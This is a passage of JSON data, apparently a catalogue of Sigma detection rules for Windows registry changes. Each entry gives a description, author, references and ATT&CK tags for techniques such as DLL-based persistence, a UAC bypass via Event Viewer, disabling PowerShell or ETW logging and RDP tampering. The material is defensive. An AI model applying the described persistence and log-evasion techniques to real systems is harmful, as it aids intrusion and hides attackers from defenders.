"registry_set_tls_protocol_old_version_enabled.yml", "level": "medium", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://techcommunity.microsoft.com/t5/windows-it-pro-blog/tls-1-0-and-tls-1-1-soon-to-be-disabled-in-windows/ba-p/3887947", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_tls_protocol_old_version_enabled.yml" ], "tags": [ "attack.defense-evasion" ] }, "uuid": "439957a7-ad86-4a8f-9705-a28131c6821b", "value": "Old TLS1.0/TLS1.1 Protocol Version Enabled" }, { "description": "Detects when an attacker registers a new IFilter for an extension. Microsoft Windows Search uses filters to extract the content of items for inclusion in a full-text index.\nYou can extend Windows Search to index new or proprietary file types by writing filters to extract the content, and property handlers to extract the properties of files.\n", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-07-21", "falsepositive": [ "Legitimate registration of IFilters by the OS or software" ], "filename": "registry_set_persistence_ifilter.yml", "level": "medium", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://github.com/gtworek/PSBits/tree/master/IFilter", "https://persistence-info.github.io/Data/ifilters.html", "https://github.com/gtworek/PSBits/blob/8d767892f3b17eefa4d0668f5d2df78e844f01d8/IFilter/Dll.cpp#L281-L308", "https://twitter.com/0gtweet/status/1468548924600459267", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_ifilter.yml" ], "tags": [ "attack.persistence" ] }, "uuid": "b23818c7-e575-4d13-8012-332075ec0a2b", "value": "Register New IFiltre For Persistence" }, { "description": "Detects changes to Internet Explorer's (IE / Windows Internet properties) ZoneMap configuration of the \"HTTP\" and \"HTTPS\" protocols to point to the \"My Computer\" zone. This allows downloaded files from the Internet to be granted the same level of trust as files stored locally.\n", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems), Michael Haag (idea)", "creation_date": "2023-09-05", "falsepositive": [ "Unknown" ], "filename": "registry_set_ie_security_zone_protocol_defaults_downgrade.yml", "level": "high", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://www.virustotal.com/gui/file/339ff720c74dc44265b917b6d3e3ba0411d61f3cd3c328e9a2bae81592c8a6e5/content", "https://twitter.com/M_haggis/status/1699056847154725107", "https://twitter.com/JAMESWT_MHT/status/1699042827261391247", "https://learn.microsoft.com/en-us/troubleshoot/developer/browsers/security-privacy/ie-security-zones-registry-entries", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_ie_security_zone_protocol_defaults_downgrade.yml" ], "tags": [ "attack.defense-evasion" ] }, "uuid": "3fd4c8d7-8362-4557-a8e6-83b29cc0d724", "value": "IE ZoneMap Setting Downgraded To MyComputer Zone For HTTP Protocols" }, { "description": "Detects installation of NalDrv or PROCEXP152 services via registry-keys to non-system32 folders.\nBoth services are used in the tool Ghost-In-The-Logs (https://github.com/bats3c/Ghost-In-The-Logs), which uses KDU (https://github.com/hfiref0x/KDU)\n", "meta": { "author": "xknow (@xknow_infosec), xorxes (@xor_xes)", "creation_date": "2019-04-08", "falsepositive": [ "Other legimate tools using this service names and drivers. Note - clever attackers may easily bypass this detection by just renaming the services. Therefore just Medium-level and don't rely on it." ], "filename": "registry_set_susp_service_installed.yml", "level": "medium", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://web.archive.org/web/20200419024230/https://blog.dylan.codes/evading-sysmon-and-windows-event-logging/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_susp_service_installed.yml" ], "tags": [ "attack.t1562.001", "attack.defense-evasion" ] }, "related": [ { "dest-uuid": "ac08589e-ee59-4935-8667-d845e38fe579", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "f2485272-a156-4773-82d7-1d178bc4905b", "value": "Suspicious Service Installed" }, { "description": "Detects changes to the registry for the currently logged-in user. In order to disable PowerShell module logging, script block logging or transcription and script execution logging", "meta": { "author": "frack113", "creation_date": "2022-04-02", "falsepositive": [ "Unknown" ], "filename": "registry_set_powershell_logging_disabled.yml", "level": "high", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md#atomic-test-32---windows-powershell-logging-disabled", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_powershell_logging_disabled.yml" ], "tags": [ "attack.defense-evasion", "attack.t1564.001" ] }, "related": [ { "dest-uuid": "ec8fc7e2-b356-455c-8db5-2e37be158e7d", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "fecfd1a1-cc78-4313-a1ea-2ee2e8ec27a7", "value": "PowerShell Logging Disabled Via Registry Key Tampering" }, { "description": "Detects potential registry persistence technique using the Event Viewer \"Events.asp\" technique", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-02-17", "falsepositive": [ "Unknown" ], "filename": "registry_set_persistence_event_viewer_events_asp.yml", "level": "medium", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://admx.help/?Category=Windows_7_2008R2&Policy=Microsoft.Policies.InternetCommunicationManagement::EventViewer_DisableLinks", "https://www.hexacorn.com/blog/2019/02/15/beyond-good-ol-run-key-part-103/", "https://github.com/redcanaryco/atomic-red-team/blob/f296668303c29d3f4c07e42bdd2b28d8dd6625f9/atomics/T1112/T1112.md", "https://twitter.com/nas_bench/status/1626648985824788480", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_event_viewer_events_asp.yml" ], "tags": [ "attack.persistence", "attack.defense-evasion", "attack.t1112" ] }, "related": [ { "dest-uuid": "57340c81-c025-4189-8fa0-fc7ede51bae4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "a1e11042-a74a-46e6-b07c-c4ce8ecc239b", "value": "Potential Persistence Via Event Viewer Events.asp" }, { "description": "Detects the enabling of the \"EnablePeriodicBackup\" registry value. Once enabled, The OS will backup System registry hives on restarts to the \"C:\\Windows\\System32\\config\\RegBack\" folder. Windows creates a \"RegIdleBackup\" task to manage subsequent backups.\nRegistry backup was a default behavior on Windows and was disabled as of \"Windows 10, version 1803\".\n", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2024-07-01", "falsepositive": [ "Legitimate need for RegBack feature by administrators." ], "filename": "registry_set_enable_periodic_backup.yml", "level": "medium", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/troubleshoot/windows-client/installing-updates-features-roles/system-registry-no-backed-up-regback-folder", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_enable_periodic_backup.yml" ], "tags": [ "attack.collection", "attack.t1113" ] }, "related": [ { "dest-uuid": "0259baeb-9f63-4c69-bf10-eb038c390688", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "973ef012-8f1a-4c40-93b4-7e659a5cd17f", "value": "Periodic Backup For System Registry Hives Enabled" }, { "description": "Detect use of scrobj.dll as this DLL looks for the ScriptletURL key to get the location of the script to execute", "meta": { "author": "frack113", "creation_date": "2022-08-20", "falsepositive": [ "Legitimate use of the dll." ], "filename": "registry_set_persistence_scrobj_dll.yml", "level": "medium", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1546.015/T1546.015.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_scrobj_dll.yml" ], "tags": [ "attack.persistence", "attack.t1546.015" ] }, "related": [ { "dest-uuid": "bc0f5e80-91c0-4e04-9fbb-e4e332c85dae", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "fe20dda1-6f37-4379-bbe0-a98d400cae90", "value": "Potential Persistence Via Scrobj.dll COM Hijacking" }, { "description": "Running Chrome VPN Extensions via the Registry install 2 vpn extension", "meta": { "author": "frack113", "creation_date": "2021-12-28", "falsepositive": [ "Unknown" ], "filename": "registry_set_chrome_extension.yml", "level": "high", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1133/T1133.md#atomic-test-1---running-chrome-vpn-extensions-via-the-registry-2-vpn-extension", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_chrome_extension.yml" ], "tags": [ "attack.persistence", "attack.t1133" ] }, "related": [ { "dest-uuid": "10d51417-ee35-4589-b1ff-b6df1c334e8d", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "b64a026b-8deb-4c1d-92fd-98893209dff1", "value": "Running Chrome VPN Extensions via the Registry 2 VPN Extension" }, { "description": "Detects the abuse of the exefile handler in new file association. Used for bypass of security products.", "meta": { "author": "Andreas Hunkeler (@Karneades)", "creation_date": "2021-11-19", "falsepositive": [ "Unknown" ], "filename": "registry_set_file_association_exefile.yml", "level": "high", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://twitter.com/mrd0x/status/1461041276514623491", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_file_association_exefile.yml" ], "tags": [ "attack.defense-evasion" ] }, "uuid": "44a22d59-b175-4f13-8c16-cbaef5b581ff", "value": "New File Association Using Exefile" }, { "description": "Detects tampering with EventLog service \"file\" key. In order to change the default location of an Evtx file. This technique is used to tamper with log collection and alerting", "meta": { "author": "D3F7A5105", "creation_date": "2023-01-02", "falsepositive": [ "Unknown" ], "filename": "registry_set_evtx_file_key_tamper.yml", "level": "high", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/windows/win32/eventlog/eventlog-key", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_evtx_file_key_tamper.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562.002" ] }, "related": [ { "dest-uuid": "4eb28bed-d11a-4641-9863-c2ac017d910a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "0cb8d736-995d-4ce7-a31e-1e8d452a1459", "value": "Potential EventLog File Location Tampering" }, { "description": "Detects UAC bypass method using Windows event viewer", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2017-03-19", "falsepositive": [ "Unknown" ], "filename": "registry_set_uac_bypass_eventvwr.yml", "level": "high", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://www.hybrid-analysis.com/sample/e122bc8bf291f15cab182a5d2d27b8db1e7019e4e96bb5cdbd1dfe7446f3f51f?environmentId=100", "https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_uac_bypass_eventvwr.yml" ], "tags": [ "attack.defense-evasion", "attack.privilege-escalation", "attack.t1548.002", "car.2019-04-001" ] }, "related": [ { "dest-uuid": "120d5519-3098-4e1c-9191-2aa61232f073", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "7c81fec3-1c1d-43b0-996a-46753041b1b6", "value": "UAC Bypass via Event Viewer" }, { "description": "Potential adversaries stopping ETW providers recording loaded .NET assemblies.", "meta": { "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "creation_date": "2020-06-05", "falsepositive": [ "Unknown" ], "filename": "registry_set_dot_net_etw_tamper.yml", "level": "high", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://social.msdn.microsoft.com/Forums/vstudio/en-US/0878832e-39d7-4eaf-8e16-a729c4c40975/what-can-i-use-e13c0d23ccbc4e12931bd9cc2eee27e4-for?forum=clr", "https://github.com/dotnet/runtime/blob/f62e93416a1799aecc6b0947adad55a0d9870732/src/coreclr/src/inc/clrconfigvalues.h#L35-L38", "https://github.com/dotnet/runtime/blob/7abe42dc1123722ed385218268bb9fe04556e3d3/src/coreclr/src/inc/clrconfig.h#L33-L39", "https://github.com/dotnet/runtime/blob/4f9ae42d861fcb4be2fcd5d3d55d5f227d30e723/docs/coding-guidelines/clr-jit-coding-conventions.md#1412-disabling-code", "https://blog.xpnsec.com/hiding-your-dotnet-complus-etwenabled/", "http://managed670.rssing.com/chan-5590147/all_p1.html", "https://bunnyinside.com/?term=f71e8cb9c76a", "https://twitter.com/_xpn_/status/1268712093928378368", "https://i.blackhat.com/EU-21/Wednesday/EU-21-Teodorescu-Veni-No-Vidi-No-Vici-Attacks-On-ETW-Blind-EDRs.pdf", "https://github.com/dotnet/runtime/search?p=1&q=COMPlus_&unscoped_q=COMPlus_", "https://github.com/dotnet/runtime/blob/ee2355c801d892f2894b0f7b14a20e6cc50e0e54/docs/design/coreclr/jit/viewing-jit-dumps.md#setting-configuration-variables", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_dot_net_etw_tamper.yml" ], "tags": [ "attack.defense-evasion", "attack.t1112", "attack.t1562" ] }, "related": [ { "dest-uuid": "57340c81-c025-4189-8fa0-fc7ede51bae4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "3d333250-30e4-4a82-9edc-756c68afc529", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "bf4fc428-dcc3-4bbd-99fe-2422aeee2544", "value": "ETW Logging Disabled In .NET Processes - Sysmon Registry" }, { "description": "Detect potential persistence via the creation of an excel add-in (XLL) file to make it run automatically when Excel is started.", "meta": { "author": "frack113", "creation_date": "2023-01-15", "falsepositive": [ "Unknown" ], "filename": "registry_set_persistence_xll.yml", "level": "high", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/4ae9580a1a8772db87a1b6cdb0d03e5af231e966/atomics/T1137.006/T1137.006.md", "https://labs.withsecure.com/publications/add-in-opportunities-for-office-persistence", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_xll.yml" ], "tags": [ "attack.persistence", "attack.t1137.006" ] }, "related": [ { "dest-uuid": "34f1d81d-fe88-4f97-bd3b-a3164536255d", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "961e33d1-4f86-4fcf-80ab-930a708b2f82", "value": "Potential Persistence Via Excel Add-in - Registry" }, { "description": "Detects modification to the \"Default\" value of the \"MyComputer\" key and subkeys to point to a custom binary that will be launched whenever the associated action is executed (see reference section for example)", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-08-09", "falsepositive": [ "Unlikely but if you experience FPs add specific processes and locations you would like to monitor for" ], "filename": "registry_set_persistence_mycomputer.yml", "level": "high", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://www.hexacorn.com/blog/2017/01/18/beyond-good-ol-run-key-part-55/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_mycomputer.yml" ], "tags": [ "attack.persistence" ] }, "uuid": "8fbe98a8-8f9d-44f8-aa71-8c572e29ef06", "value": "Potential Persistence Via MyComputer Registry Keys" }, { "description": "Detects the addition of new root, CA or AuthRoot certificates to the Windows registry", "meta": { "author": "frack113", "creation_date": "2022-04-04", "falsepositive": [ "Unknown" ], "filename": "registry_set_install_root_or_ca_certificat.yml", "level": "medium", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://posts.specterops.io/code-signing-certificate-cloning-attacks-and-defenses-6f98657fc6ec", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1553.004/T1553.004.md#atomic-test-6---add-root-certificate-to-currentuser-certificate-store", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_install_root_or_ca_certificat.yml" ], "tags": [ "attack.impact", "attack.t1490" ] }, "related": [ { "dest-uuid": "f5d8eed6-48a9-4cdf-a3d7-d1ffa99c3d2a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "d223b46b-5621-4037-88fe-fda32eead684", "value": "New Root or CA or AuthRoot Certificate to Store" }, { "description": "Detects when an attacker modifies the registry key \"HtmlHelp Author\" to achieve persistence", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-07-21", "falsepositive": [ "Unknown" ], "filename": "registry_set_persistence_chm.yml", "level": "high", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://persistence-info.github.io/Data/htmlhelpauthor.html", "https://www.hexacorn.com/blog/2018/04/22/beyond-good-ol-run-key-part-76/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_chm.yml" ], "tags": [ "attack.persistence" ] }, "uuid": "976dd1f2-a484-45ec-aa1d-0e87e882262b", "value": "Potential Persistence Via CHM Helper DLL" }, { "description": "Detects changes to the Netsh registry key to add a new DLL value that is located on a suspicious location. This change might be an indication of a potential persistence attempt by adding a malicious Netsh helper\n", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-11-28", "falsepositive": [ "Unknown" ], "filename": "registry_set_netsh_help_dll_persistence_susp_location.yml", "level": "high", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://www.ired.team/offensive-security/persistence/t1128-netsh-helper-dll", "https://pentestlab.blog/2019/10/29/persistence-netsh-helper-dll/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_netsh_help_dll_persistence_susp_location.yml" ], "tags": [ "attack.persistence", "attack.t1546.007" ] }, "related": [ { "dest-uuid": "f63fe421-b1d1-45c0-b8a7-02cd16ff2bed", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "e7b18879-676e-4a0e-ae18-27039185a8e7", "value": "New Netsh Helper DLL Registered From A Suspicious Location" }, { "description": "Detects the keyboard preload installation with a suspicious keyboard layout, e.g. Chinese, Iranian or Vietnamese layout load in user session on systems maintained by US staff only", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2019-10-12", "falsepositive": [ "Administrators or users that actually use the selected keyboard layouts (heavily depends on the organisation's user base)" ], "filename": "registry_set_susp_keyboard_layout_load.yml", "level": "medium", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://github.com/SwiftOnSecurity/sysmon-config/pull/92/files", "https://renenyffenegger.ch/notes/Windows/registry/tree/HKEY_CURRENT_USER/Keyboard-Layout/Preload/index", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_susp_keyboard_layout_load.yml" ], "tags": [ "attack.resource-development", "attack.t1588.002" ] }, "related": [ { "dest-uuid": "a2fdce72-04b2-409a-ac10-cc1695f4fce0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "34aa0252-6039-40ff-951f-939fd6ce47d8", "value": "Suspicious Keyboard Layout Load" }, { "description": "Detects changes in Sysmon driver altitude value.\nIf the Sysmon driver is configured to load at an altitude of another registered service, it will fail to load at boot.\n", "meta": { "author": "B.Talebi", "creation_date": "2022-07-28", "falsepositive": [ "Legitimate driver altitude change to hide sysmon" ], "filename": "registry_set_change_sysmon_driver_altitude.yml", "level": "high", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://posts.specterops.io/shhmon-silencing-sysmon-via-driver-unload-682b5be57650", "https://youtu.be/zSihR3lTf7g", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_change_sysmon_driver_altitude.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562.001" ] }, "related": [ { "dest-uuid": "ac08589e-ee59-4935-8667-d845e38fe579", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "4916a35e-bfc4-47d0-8e25-a003d7067061", "value": "Sysmon Driver Altitude Change" }, { "description": "Detect enable rdp feature to allow specific user to rdp connect on the targeted machine", "meta": { "author": "frack113", "creation_date": "2022-08-19", "falsepositive": [ "Legitimate use of the feature (alerts should be investigated either way)" ], "filename": "registry_set_allow_rdp_remote_assistance_feature.yml", "level": "medium", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1112/T1112.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_allow_rdp_remote_assistance_feature.yml" ], "tags": [ "attack.defense-evasion", "attack.t1112" ] }, "related": [ { "dest-uuid": "57340c81-c025-4189-8fa0-fc7ede51bae4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "37b437cf-3fc5-4c8e-9c94-1d7c9aff842b", "value": "Allow RDP Remote Assistance Feature" }, { "description": "Detects when an attacker modifies the \"REG_MULTI_SZ\" value named \"Extensions\" to include a custom DLL to achieve persistence via lsass.\nThe \"Extensions\" list contains filenames of DLLs being automatically loaded by lsass.exe. Each DLL has its InitializeLsaExtension() method called after loading.\n", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-07-21", "falsepositive": [ "Unlikely" ], "filename": "registry_set_persistence_lsa_extension.yml", "level": "high", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://persistence-info.github.io/Data/lsaaextension.html", "https://twitter.com/0gtweet/status/1476286368385019906", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_lsa_extension.yml" ], "tags": [ "attack.persistence" ] }, "uuid": "41f6531d-af6e-4c6e-918f-b946f2b85a36", "value": "Potential Persistence Via LSA Extensions" }, { "description": "Detects tampering of RDP Terminal Service/Server sensitive settings.\nSuch as allowing unauthorized users access to a system via the 'fAllowUnsolicited' or enabling RDP via 'fDenyTSConnections'...etc\n", "meta": { "author": "Samir Bousseaden, David ANDRE, Roberto Rodriguez @Cyb3rWard0g, Nasreddine Bencherchali", "creation_date": "2022-08-06", "falsepositive": [ "Some of the keys mentioned here could be modified by an administrator while setting group policy (it should be investigated either way)" ], "filename": "registry_set_terminal_server_tampering.yml", "level": "high", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "http://etutorials.org/Microsoft+Products/microsoft+windows+server+2003+terminal+services/Chapter+6+Registry/Registry+Keys+for+Terminal+Services/", "https://blog.sekoia.io/darkgate-internals/", "https://web.archive.org/web/20200929062532/https://blog.menasec.net/2019/02/threat-hunting-rdp-hijacking-via.html", "https://bazaar.abuse.ch/sample/6f3aa9362d72e806490a8abce245331030d1ab5ac77e400dd475748236a6cc81/", "https://github.com/redcanaryco/atomic-red-team/blob/02c7d02fe1f1feb0fc7944550408ea8224273994/atomics/T1112/T1112.md#atomic-test-63---disable-remote-desktop-anti-alias-setting-through-registry", "https://threathunterplaybook.com/hunts/windows/190407-RegModEnableRDPConnections/notebook.html", "https://admx.help/HKLM/SOFTWARE/Policies/Microsoft/Windows%20NT/Terminal%20Services", "https://twitter.com/SagieSec/status/1469001618863624194?t=HRf0eA0W1YYzkTSHb-Ky1A&s=03", "http://woshub.com/rds-shadow-how-to-connect-to-a-user-session-in-windows-server-2012-r2/", "https://github.com/redcanaryco/atomic-red-team/blob/02c7d02fe1f1feb0fc7944550408ea8224273994/atomics/T1112/T1112.md#atomic-test-64---disable-remote-desktop-security-settings-through-registry", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_terminal_server_tampering.yml" ], "tags": [ "attack.defense-evasion", "attack.persistence", "attack.t1112" ] }, "related": [ { "dest-uuid": "57340c81-c025-4189-8fa0-fc7ede51bae4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "3f6b7b62-61aa-45db-96bd-9c31b36b653c", "value": "RDP Sensitive Settings Changed" }, { "description": "Detects the modification of the registry to disable a system restore on the computer", "meta": { "author": "frack113", "creation_date": "2022-04-04", "falsepositive": [ "Unknown" ], "filename": "registry_set_disable_system_restore.yml", "level": "high", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md#atomic-test-9---disable-system-restore-through-registry", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disable_system_restore.yml" ], "tags": [ "attack.impact", "attack.t1490" ] }, "related": [ { "dest-uuid": "f5d8eed6-48a9-4cdf-a3d7-d1ffa99c3d2a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "5de03871-5d46-4539-a82d-3aa992a69a83", "value": "Registry Disable System Restore" }, { "description": "Detects VBScript content stored into registry keys as seen being used by UNC2452 group", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2021-03-05", "falsepositive": [ "Unknown" ], "filename": "registry_set_vbs_payload_stored.yml", "level": "high", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://www.microsoft.com/security/blog/2021/03/04/goldmax-goldfinder-sibot-analyzing-nobelium-malware/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_vbs_payload_stored.yml" ], "tags": [ "attack.persistence", "attack.t1547.001" ] }, "related": [ { "dest-uuid": "9efb1ea7-c37b-4595-9640-b7680cd84279", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "46490193-1b22-4c29-bdd6-5bf63907216f", "value": "VBScript Payload Stored in Registry" }, { "description": "Detects processes setting a new DLL in DllName in under HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\W32Time\\TimeProvider.\nAdversaries may abuse time providers to execute DLLs when the system boots.\nThe Windows Time service (W32Time) enables time synchronization across and within domains.\n", "meta": { "author": "frack113", "creation_date": "2022-06-19", "falsepositive": [ "Unknown" ], "filename": "registry_set_timeproviders_dllname.yml", "level": "high", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.003/T1547.003.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_timeproviders_dllname.yml" ], "tags": [ "attack.persistence", "attack.privilege-escalation", "attack.t1547.003" ] }, "related": [ { "dest-uuid": "61afc315-860c-4364-825d-0d62b2e91edc", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "e88a6ddc-74f7-463b-9b26-f69fc0d2ce85", "value": "New TimeProviders Registered With Uncommon DLL Name" }, { "description": "Detects activity that indicates a user disabling the ability for Antivirus mini filter to inspect a \"Dev Drive\".\n", "meta": { "author": "@kostastsale, Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-11-05", "falsepositive": [ "Unlikely" ], "filename": "registry_set_devdrv_disallow_antivirus_filter.yml", "level": "high", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://twitter.com/0gtweet/status/1720419490519752955", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_devdrv_disallow_antivirus_filter.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562.001" ] }, "related": [ { "dest-uuid": "ac08589e-ee59-4935-8667-d845e38fe579", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "31e124fb-5dc4-42a0-83b3-44a69c77b271", "value": "Antivirus Filter Driver Disallowed On Dev Drive - Registry" }, { "description": "Detects modification of autostart extensibility point (ASEP) in registry.", "meta": { "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", "creation_date": "2019-10-25", "falsepositive": [ "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", "Legitimate administrator sets up autorun keys for legitimate reason" ], "filename": "registry_set_asep_reg_keys_modification_office.yml", "level": "medium", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md", "https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d", "https://learn.microsoft.com/en-us/sysinternals/downloads/autoruns", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_office.yml" ], "tags": [ "attack.persistence", "attack.t1547.001" ] }, "related": [ { "dest-uuid": "9efb1ea7-c37b-4595-9640-b7680cd84279", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "baecf8fb-edbf-429f-9ade-31fc3f22b970", "value": "Office Autorun Keys Modification" }, { "description": "Detects changes to the HypervisorEnforcedCodeIntegrity registry key and the \"Enabled\" value being set to 0 in order to disable the Hypervisor Enforced Code Integrity feature. This allows an attacker to load unsigned and untrusted code to be run in the kernel\n", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems), Anish Bogati", "creation_date": "2023-03-14", "falsepositive": [ "Unknown" ], "filename": "registry_set_deviceguard_hypervisorenforcedcodeintegrity_disabled.yml", "level": "high", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ 